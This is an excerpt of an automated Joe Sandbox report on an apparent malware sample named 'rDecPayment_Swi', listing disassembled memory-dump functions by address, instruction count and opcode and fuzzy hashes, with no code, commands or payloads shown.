                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: T
                                            • API String ID: 0-3187964512
                                            • Opcode ID: 458020fe15e4fa4f706f574643bb55284e6df9f110c01d329722075aeaf9d590
                                            • Instruction ID: 1ed951f2f53289acfe65ac55069d68f7acd4be808a1bc0a52c51802d29faa94d
                                            • Opcode Fuzzy Hash: 458020fe15e4fa4f706f574643bb55284e6df9f110c01d329722075aeaf9d590
                                            • Instruction Fuzzy Hash: 1021CC71D197558FE729CF6B8814299BBF7AF8A200F04C0EAD4489B225DA740A86DF11
                                            Function 06210036 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2336054217.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: T
                                            • API String ID: 0-3187964512
                                            • Opcode ID: dcd1174b184119089c2ae3f901a8ccdf0ae2aa3dda16af4e85d2b8a5ec80563c
                                            • Instruction ID: a8d8856f33d0d3defab6286d2493ad8309a400abf5503dabc943df3cff8bdb98
                                            • Opcode Fuzzy Hash: dcd1174b184119089c2ae3f901a8ccdf0ae2aa3dda16af4e85d2b8a5ec80563c
                                            • Instruction Fuzzy Hash: BE21AC71D057198FEB2CCF6B890539AF6F7AFC9300F04C1BA994CAA255DB740A869F50
                                            Function 05E565F8 Relevance: .4, Instructions: 431COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0142d05a0a0c07e9d222ec73d2491bd850b5a609fb6e5bac1bf980881cbfb2d5
                                            • Instruction ID: d2f0b5664d21b84bc56230ecff07b387bcf90144c9065723a24ba46234e5c02e
                                            • Opcode Fuzzy Hash: 0142d05a0a0c07e9d222ec73d2491bd850b5a609fb6e5bac1bf980881cbfb2d5
                                            • Instruction Fuzzy Hash: 9812C371E046188FDB14CFAAC98069DFBF2FF88314F64D169D858AB21AD734A946CF50
                                            Function 060D6A80 Relevance: .2, Instructions: 221COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335641417.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60d0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bcce75aacf626400abba2177e9774421ecb03598ca71474dc8fadc4cb712608d
                                            • Instruction ID: 1c479293231cc45fe34faef95fc69ad052eb5a1f8994161472133ed77d4b5ead
                                            • Opcode Fuzzy Hash: bcce75aacf626400abba2177e9774421ecb03598ca71474dc8fadc4cb712608d
                                            • Instruction Fuzzy Hash: 2C9124B0D65318CFEB94CFA9C5447EDBBF1AB49314F20822AE009A7291DB7A5985CF44
                                            Function 060D6A90 Relevance: .2, Instructions: 218COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335641417.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60d0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2c467a0d4efd7b6bb286d19379194707f62dcd914f608f6bfd219aa9c66f5ba7
                                            • Instruction ID: 73bb021f54ea068fa3349bb12e3525b9be23c313d30828e1c248bcc8bceafd11
                                            • Opcode Fuzzy Hash: 2c467a0d4efd7b6bb286d19379194707f62dcd914f608f6bfd219aa9c66f5ba7
                                            • Instruction Fuzzy Hash: B49115B0D69318CFEB94CF99C5447EDBBF1BB49314F20822AE008A7295DB7A5985CF44
                                            Function 060D7C08 Relevance: .1, Instructions: 142COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335641417.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60d0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 66e92dc6501b0250e508a05023786b6272a66f5f0a12a68e73a54c43fbea8269
                                            • Instruction ID: 533ca4093de9c21b4a70e01afb5040a9624a9e52b3ef3270dc114cb7753ffbd2
                                            • Opcode Fuzzy Hash: 66e92dc6501b0250e508a05023786b6272a66f5f0a12a68e73a54c43fbea8269
                                            • Instruction Fuzzy Hash: 74513474D46318CFDB94DFA9D484BEDBBF2BF49305F10A62AD449A7280C7749986CB40
                                            Function 060D7C18 Relevance: .1, Instructions: 139COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335641417.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60d0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4da80999396ba8b61a1b4d48eea03a0917feca589ec5a2f91e2c8930ff218d75
                                            • Instruction ID: b59941a1ecd7acb55201fadaf452218d679ed701b1bd6ddb2778bb87013e9020
                                            • Opcode Fuzzy Hash: 4da80999396ba8b61a1b4d48eea03a0917feca589ec5a2f91e2c8930ff218d75
                                            • Instruction Fuzzy Hash: 97513474D46318CFDB94DFA9D484BEDBBF2BF4A305F10A62AD409A7280DB745985CB40
                                            Function 05E565E8 Relevance: .1, Instructions: 136COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 134407b378d736a8d2de78dc6cec72c83c82fca631fc35df1458e3c9bf3788f4
                                            • Instruction ID: 8ca3615cf9c88942107f5570f638b721f639bea701fa1590846c49d94683393a
                                            • Opcode Fuzzy Hash: 134407b378d736a8d2de78dc6cec72c83c82fca631fc35df1458e3c9bf3788f4
                                            • Instruction Fuzzy Hash: FA5196B1E016198BDB08CFABD94069EFBF3AFC8310F14C07AD948AB224EB7059458B54
                                            Function 01161908 Relevance: .1, Instructions: 117COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2313440096.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_1160000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 810f7b7b4ed93bbcd579fadde8c093eddbaf88682562b99ee7ffbada2b122e87
                                            • Instruction ID: 9d4f60af858dd4c20e2d1bf8bd9d22947a70b1f407fff5ac23245373d8f331b7
                                            • Opcode Fuzzy Hash: 810f7b7b4ed93bbcd579fadde8c093eddbaf88682562b99ee7ffbada2b122e87
                                            • Instruction Fuzzy Hash: 8141F2B0D04349CFDB18CFA9D994A9DBBF5FB09304F249029E818BB254D7759846CF85
                                            Function 05E57DA0 Relevance: .1, Instructions: 96COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ef945c8ff11587eeb58b5bdfc020905047052df4a5e22262104617c31947bd6c
                                            • Instruction ID: a4eb2626ca2da508e9e48a4105b7e9d09d07e75025c62e86bc842d60dfa61abb
                                            • Opcode Fuzzy Hash: ef945c8ff11587eeb58b5bdfc020905047052df4a5e22262104617c31947bd6c
                                            • Instruction Fuzzy Hash: 3D415071E15B188BEB5CCF6B9D406DAFAF3AFC9311F14D1BA984CAA255EB3009458F01
                                            Function 060DD9C7 Relevance: .1, Instructions: 91COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335641417.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60d0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f44e029359009918611059ba2fc61fa3ef913f756456f86a0df80d950f0ebdf7
                                            • Instruction ID: 8019da5d19f79094625643b8ade8b72fe236ad9f519e221b45e61bdff4a48fd0
                                            • Opcode Fuzzy Hash: f44e029359009918611059ba2fc61fa3ef913f756456f86a0df80d950f0ebdf7
                                            • Instruction Fuzzy Hash: 94313674E45229CFCB94DFA9D4457AEBBF1FF4A304F10816AD449A3284DB309A85CF41
                                            Function 060FFCB1 Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335730568.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60f0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e7dc58ebbee925ca9cca341cea0014d7b90f803eaf3bba89227d76cbf970d4ec
                                            • Instruction ID: 406be2763f1a6fc5111886b38acbd13918839db4c7d358d226a91ce9d04c4fa1
                                            • Opcode Fuzzy Hash: e7dc58ebbee925ca9cca341cea0014d7b90f803eaf3bba89227d76cbf970d4ec
                                            • Instruction Fuzzy Hash: 5E211EB5C102089FCB10DFA9D980AEEFBF5FB49320F14901AE809B7210C739A945CFA4
                                            Function 060FFCB8 Relevance: .1, Instructions: 66COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335730568.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60f0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c12dc80e2374f59066aff12962926f055da94e9c10d7f4fd1b5c771150d0c651
                                            • Instruction ID: 36387ea4a9075544d7bbf58ac6a251d44197cfd72d958098cab071de514d0364
                                            • Opcode Fuzzy Hash: c12dc80e2374f59066aff12962926f055da94e9c10d7f4fd1b5c771150d0c651
                                            • Instruction Fuzzy Hash: 8B21FEB5D102089FCB10DFA9D984AEEFBF5FB49310F14901AE909B7210C735A941CFA4

                                            Executed Functions

                                            Function 029A1EE8 Relevance: 2.1, Strings: 1, Instructions: 843COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3267370172.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_29a0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Ddq
                                            • API String ID: 0-562783569
                                            • Opcode ID: c21ad8cb6f36049aaeb1419f9659ccd45d8ca32bc624b07ac3c410cb2f7986d4
                                            • Instruction ID: 820529c65307b7e8b1bedd1ae3d0ee1cfc0b2796ca5d8d1f4333bd7ea839a9e6
                                            • Opcode Fuzzy Hash: c21ad8cb6f36049aaeb1419f9659ccd45d8ca32bc624b07ac3c410cb2f7986d4
                                            • Instruction Fuzzy Hash: 61722535900296CFC701EBB8DC9669DBFF1FFC9300B198996C461AB256DB35A846CBD0
                                            Function 029A1A5A Relevance: 3.8, Strings: 3, Instructions: 96COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3267370172.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_29a0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: *A$Te]q$Te]q
                                            • API String ID: 0-1767941818
                                            • Opcode ID: 1fe20045bb4089248fbc6c1c6990bb615995d044ec474bdfa685cbbd4c07cfdb
                                            • Instruction ID: d443eec5cd917e9ab42ee24c657edbcbd246996bd27559a5f8dc372f00829b3b
                                            • Opcode Fuzzy Hash: 1fe20045bb4089248fbc6c1c6990bb615995d044ec474bdfa685cbbd4c07cfdb
                                            • Instruction Fuzzy Hash: 6241FA74A00104CFCB44DFA8D5A8AAD7BF2BF88704F2544A9E40AAB365DA759D01CF50
                                            Function 029A1ED9 Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3267370172.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_29a0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Ddq
                                            • API String ID: 0-562783569
                                            • Opcode ID: 7478fbfccff7600c4014247a11eaf44be1fa32d732b1fbfb6fa0a14fb544242a
                                            • Instruction ID: eba02cb53ff7242255a1d0256ecbc6945f335c3d673caaceafe630b43f5c8172
                                            • Opcode Fuzzy Hash: 7478fbfccff7600c4014247a11eaf44be1fa32d732b1fbfb6fa0a14fb544242a
                                            • Instruction Fuzzy Hash: E1618E38A006108FC714EF29D594A59BBF6FF88314B558169D809EB3A9EB31EC01CF90
                                            Function 029A5370 Relevance: .4, Instructions: 397COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3267370172.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_29a0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: efc2ca60e85aef133ea4d9f0e963b19905167b7b91094bad4b0e3b506f71241f
                                            • Instruction ID: 8eadb669189c009a5c6632d636657608082cf74b8c9d222fa44623ddd7b0badf
                                            • Opcode Fuzzy Hash: efc2ca60e85aef133ea4d9f0e963b19905167b7b91094bad4b0e3b506f71241f
                                            • Instruction Fuzzy Hash: 1721A2B4E49204DFE700DFA8D058799BBF1EF45304F61C4EAC005D7690D7B48A89CB82
                                            Function 029A08D0 Relevance: .1, Instructions: 78COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3267370172.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_29a0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea19836601169324545c9d965271b066eb53dc0d46a0353243f7663d1398d9cd
                                            • Instruction ID: 25ec3d20007b4d16f6a107066c62c51213b265441f6a54b26165b694e55ff634
                                            • Opcode Fuzzy Hash: ea19836601169324545c9d965271b066eb53dc0d46a0353243f7663d1398d9cd
                                            • Instruction Fuzzy Hash: 5821E434B453848FC7129B79847469A7FF6EF8630071548AED486DB3A6EA249C0ACB91
                                            Function 029A5630 Relevance: .1, Instructions: 52COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3267370172.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_29a0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a97fd802b8e1330249b8eb558d92caab3dacab9afded75564f9f354ebde82991
                                            • Instruction ID: 8165e30c6efc0d5fd6ef75e2c1389ddab30fee1f4684c256ac23f5b239389b2a
                                            • Opcode Fuzzy Hash: a97fd802b8e1330249b8eb558d92caab3dacab9afded75564f9f354ebde82991
                                            • Instruction Fuzzy Hash: D4115EB8F45208DFE704DFA9D1587997BF1EB44309FA1C4A9C005D7684D7B49989CB82
                                            Function 029A0920 Relevance: .0, Instructions: 48COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3267370172.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_29a0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b9f076be023453c5a5f03cd74e460049c56882ff31824566e1ba5ca1f084aed4
                                            • Instruction ID: f7337b5ed55ab6565770421ba9b8f504bd49b76c3c8a52cd39e6f95526d3bfb9
                                            • Opcode Fuzzy Hash: b9f076be023453c5a5f03cd74e460049c56882ff31824566e1ba5ca1f084aed4
                                            • Instruction Fuzzy Hash: 4E0180347003048FC704AA7AC564B5B7BEAEB88700B51886CD50ADB358EF31DC058B91
                                            Function 029A093A Relevance: .0, Instructions: 44COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3267370172.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_29a0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea0dce1c1cdebd552c422ff8ffab4a732d18cb3ff92edbd79bf07ae4abbcccbc
                                            • Instruction ID: 57ad77596484e704f0c0f8edcd001acecc4486ebb28b76ef9beba6f6ddcb3442
                                            • Opcode Fuzzy Hash: ea0dce1c1cdebd552c422ff8ffab4a732d18cb3ff92edbd79bf07ae4abbcccbc
                                            • Instruction Fuzzy Hash: 3101E575B40205CFEB14CF24C569BA977B5BF98715F110898E506EB3B1CB719C01CBA0
                                            Function 029A0878 Relevance: .0, Instructions: 26COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3267370172.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_29a0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 42699a1991ee0fdef0911625cf71ee76367f5567e3b5b2211c932fa00d6b2e3b
                                            • Instruction ID: 6998774a273f5129f3c35d2c978d7ee151266114850bf5ec3576f2d56b2d2a56
                                            • Opcode Fuzzy Hash: 42699a1991ee0fdef0911625cf71ee76367f5567e3b5b2211c932fa00d6b2e3b
                                            • Instruction Fuzzy Hash: 16F0E539905309EFCB02EFA8D46065D7BF8FB1220078009E6D406C7255E7319E08C7D5
                                            Function 029A19A7 Relevance: .0, Instructions: 26COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3267370172.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_29a0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e5ad54af841e650abdaa23671174f4b1575495f6b62a3bc4ea9e13abdb776436
                                            • Instruction ID: 2631d641278791b7271f230e44e2d0f6335d42b2b0724d5f0aef9487a3a74567
                                            • Opcode Fuzzy Hash: e5ad54af841e650abdaa23671174f4b1575495f6b62a3bc4ea9e13abdb776436
                                            • Instruction Fuzzy Hash: E7F0ED386001688FC700DF78E498A897BEABF4D20474140ABF80ACB3A5EB30EC04CB51
                                            Function 029A19F9 Relevance: .0, Instructions: 23COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3267370172.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_29a0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9dfbda42682010ba770dc550dbbfbcba634a8dce078fa68a3a24f213e509bbf2
                                            • Instruction ID: 783f978aba5f9180116962de24e2c8cc03882202f9a9bc04ff57c8c7d6369e2e
                                            • Opcode Fuzzy Hash: 9dfbda42682010ba770dc550dbbfbcba634a8dce078fa68a3a24f213e509bbf2
                                            • Instruction Fuzzy Hash: 28E08639B553658FC7019F78D858489BBF8EF4B2243010AE6E946CF2A1EB209C45C7A1
                                            Function 029A0888 Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3267370172.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_29a0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ffffcf0807291c1d77964115b0517be222b618c2c5df070b009f5c45be59db79
                                            • Instruction ID: 62e5119877f37ab440bd29c39b9a28253a5116fa304de33c429432224327ec4e
                                            • Opcode Fuzzy Hash: ffffcf0807291c1d77964115b0517be222b618c2c5df070b009f5c45be59db79
                                            • Instruction Fuzzy Hash: CBE04F38905309EFCB00EFA8E52466C77B9FB01201B9049A9D50AD7244EB315E04DBD5
                                            Function 029A28CB Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3267370172.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_29a0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2c9f8eba1a032f5674570fdde06b7584c217691e5687d3bcfbbfc679e49408e4
                                            • Instruction ID: b93a4c85a91d3c4f88ec1ecc56f30140a0690785e93ac4c4c47efb79c71d6c6b
                                            • Opcode Fuzzy Hash: 2c9f8eba1a032f5674570fdde06b7584c217691e5687d3bcfbbfc679e49408e4
                                            • Instruction Fuzzy Hash: ADE01A39B001059FDB08AB74E8549ADB7A6EB88300F10C465ED16D77A4DA75DC058B41
                                            Function 029A1A08 Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3267370172.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_29a0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 350b8297f476ebafe3fc69ac198b78843e5cd032841d46911d12768ce4760f55
                                            • Instruction ID: 49d0736f2f05307437fcc281f5405447a1480115a82f566105494d08558c1641
                                            • Opcode Fuzzy Hash: 350b8297f476ebafe3fc69ac198b78843e5cd032841d46911d12768ce4760f55
                                            • Instruction Fuzzy Hash: 65D0C739B412248FCB006779D44C45977E9AF4966530005A5F90AC7360DF359C1187D1
                                            Function 029A0E14 Relevance: .0, Instructions: 14COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3267370172.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_29a0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 540df4f2a8d41401c6d342310ebd9650706bdb20d36b27ba413ab6d7a0a60139
                                            • Instruction ID: dccd36ff7e12fd1f35a8e09e33fbc774d1be79a7b43445957786023ccd715538
                                            • Opcode Fuzzy Hash: 540df4f2a8d41401c6d342310ebd9650706bdb20d36b27ba413ab6d7a0a60139
                                            • Instruction Fuzzy Hash: F5D05BAC10829047D61D5B68D49879B3B73DB51244FA4C89C819A5F249C571844FC753
                                            Function 029A0A60 Relevance: .0, Instructions: 9COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3267370172.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_29a0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf5087745fc74d5654bc1a83289566f12e1ab68a833747be28e6c04b796e25e8
                                            • Instruction ID: 0b416d327aec2b1540f15e55665144d1be56f721695869c35aa45eb71a811f86
                                            • Opcode Fuzzy Hash: bf5087745fc74d5654bc1a83289566f12e1ab68a833747be28e6c04b796e25e8
                                            • Instruction Fuzzy Hash: 5CC02B3800D1DD4FC3026FA0A4E43CBFFECBF02110F0400D1D08C88483E1545028C344
                                            Function 029A6330 Relevance: .0, Instructions: 8COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3267370172.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_29a0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6d5daf68f0a2ce7240ba5f049bdaae76af2016781134c6ce146cfdb7dd6f1330
                                            • Instruction ID: b92618bdae7d873d86522f6d5596bc7efdefa179135491999b234ea81abd2d1c
                                            • Opcode Fuzzy Hash: 6d5daf68f0a2ce7240ba5f049bdaae76af2016781134c6ce146cfdb7dd6f1330
                                            • Instruction Fuzzy Hash: A5C00278E422109BDB045B74D11C6297BA2E788206B4088AAE80BD33C2DA345819CA41
                                            Function 029ACC70 Relevance: .0, Instructions: 6COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3267370172.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_29a0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 37ae01ed15b2f1975f4c045672eb7fa8fe9f8f2c87c9d4a26ec3e457c419a6db
                                            • Instruction ID: bd8162da9f4efd115ff887981f993fe2ed05f0c5f75e67a979fefde6659962fd
                                            • Opcode Fuzzy Hash: 37ae01ed15b2f1975f4c045672eb7fa8fe9f8f2c87c9d4a26ec3e457c419a6db
                                            • Instruction Fuzzy Hash: 0EA02230082B0CC3820032B02200028B38C08C02083C000B8820C08E200CF3F0A088C0
                                            Function 029A0A70 Relevance: .0, Instructions: 5COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3267370172.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_29a0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ab1376d0c50d857c65df2b82bf19b8e9e4afc592a98915a953850030977b3b31
                                            • Instruction ID: 37ba925cd700f04956d8bfcb4aa3c72f9e68fed70e57356a08fa2754f60a527e
                                            • Opcode Fuzzy Hash: ab1376d0c50d857c65df2b82bf19b8e9e4afc592a98915a953850030977b3b31
                                            • Instruction Fuzzy Hash: 3490223808020C8B020033803008008330CB8002003800000E00C80000AA0020200280